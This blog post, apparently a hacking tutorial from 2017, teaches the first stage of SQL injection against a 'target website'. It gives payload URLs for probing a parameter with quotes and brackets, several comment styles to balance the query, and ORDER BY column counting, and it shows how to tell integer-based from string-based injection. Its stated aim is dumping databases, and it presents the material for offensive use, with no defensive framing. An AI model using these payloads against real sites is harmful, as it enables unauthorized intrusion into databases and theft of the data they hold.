SQL Injection- Basics Of SQLi Part-1

SQL Injection- Basics Of SQLi Part-1

// August 09, 2017
-
-
oleh
SQL Injection- Basics Of SQLi Part-1
SQL Injection- Basics Of SQLi Part-1
SQL Injection- Basics Of SQLi Part-1

 SQL( Structured Query Language ) Injection is one of Most Powerful Methods of System Penetration.

 SQL Injection is a Code Injection Technique that Exploits a Security Vulnerability Occurring in the Database Layer of an Application. Attacker Send His Commands TO Web Application For Dumping Database .
So Lets Start !
 First Check If  Our target Website is Vulnerable for  SQL Injection . eg
We mostly Use Single Quote  '

https://www.site.com/index.php?id=1'

 And we Get  Error . It Means That Site Is Vulnerable For SQL Injection.
SQL Injection- Basics Of SQLi Part-1
Here Some Other Ways To Check Website Vulnerbility.

 Using Closed Bracket )
https://www.site.com/index.php?id=1)

 Using Single Quote '
 https://www.site.com/index.php?id=1'

 Using Double Quote "
https://www.site.com/index.php?id=1"

 Now Next Step Is To Count Total Number Of Columns .
First Check Comment Type to Balance Our Query.

 Here Are Some Basic Comments  .
https://www.site.com/index.php?id=1--

 https://www.site.com/index.php?id=1--+

 https://www.site.com/index.php?id=1-- -

 https://www.site.com/index.php?id=1--+-

 https://www.site.com/index.php?id=1%23

 https://www.site.com/index.php?id=1;

 After Balancing Our Query Lets Count Total Number Of Columns.We Can Count Columns Using  Order By or Group By Statement .

 https://www.site.com/index.php?id=1 order By 1--

 No Error, 
https://www.site.com/index.php?id=1 order by 2--
No Error,

 https://www.site.com/index.php?id=1 order by 3--
No error,

 https://www.site.com/index.php?id=1 order by 4--

 We Got Error .
Unknown column '4' in 'order clause'
It Means Total Number Of Columns Are 3.

 it is Integer Based SQL Injection.
But  Some Times We Injecting A Site And Column Count Is 1000 But Nothing Show.eg

 https://www.site.com/index.php?id=1 order by 10000--

 it means Its String Based SQL Injection. lets Add Single Quote ' in Our Query.

 https://www.site.com/index.php?id=1' order by 10000--

 and We Got Error.
Unknown column '10000' in 'order clause'
https://www.site.com/index.php?id=1' order by 4--

 Again  Error.Unknown column '4' in 'order clause'
https://www.site.com/index.php?id=1' order by 3--

 No  Error!! Total Number Of Columns are 3.

 In My Next Tutorials We Will Discuss About Finding Vulnerable Columns With Diffirent Techniques And  WAF Bypassing.
We Will Continue Our Tutorials.

Subscribe to: Post Comments (Atom)